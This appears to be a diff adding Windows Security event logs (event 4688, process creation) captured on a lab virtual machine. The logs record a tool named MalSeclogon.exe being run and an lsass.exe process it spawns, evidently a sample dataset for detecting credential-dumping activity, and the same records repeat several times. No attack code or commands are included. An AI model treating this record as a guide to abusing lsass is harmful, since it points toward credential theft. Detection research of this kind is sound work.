+    </TimeCreated>
+    <EventRecordID>329925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x24e0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.680005Z"">
+    </TimeCreated>
+    <EventRecordID>329921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x1494</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""TargetDomainName"">WORKGROUP</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.641209Z"">
+    </TimeCreated>
+    <EventRecordID>329920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x11e4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x17b8</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.462545Z"">
+    </TimeCreated>
+    <EventRecordID>329916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1bc4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.397814Z"">
+    </TimeCreated>
+    <EventRecordID>329914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""NewProcessId"">0x21a4</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x2480</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:08.723523Z"">
+    </TimeCreated>
+    <EventRecordID>329925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x24e0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.680005Z"">
+    </TimeCreated>
+    <EventRecordID>329921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x1494</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""TargetDomainName"">WORKGROUP</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.641209Z"">
+    </TimeCreated>
+    <EventRecordID>329920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x11e4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x17b8</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.462545Z"">
+    </TimeCreated>
+    <EventRecordID>329916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1bc4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.397814Z"">
+    </TimeCreated>
+    <EventRecordID>329914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""NewProcessId"">0x21a4</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x2480</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:08.723523Z"">
+    </TimeCreated>
+    <EventRecordID>329925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x24e0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.680005Z"">
+    </TimeCreated>
+    <EventRecordID>329921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x1494</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""TargetDomainName"">WORKGROUP</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.641209Z"">
+    </TimeCreated>
+    <EventRecordID>329920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x11e4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x17b8</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
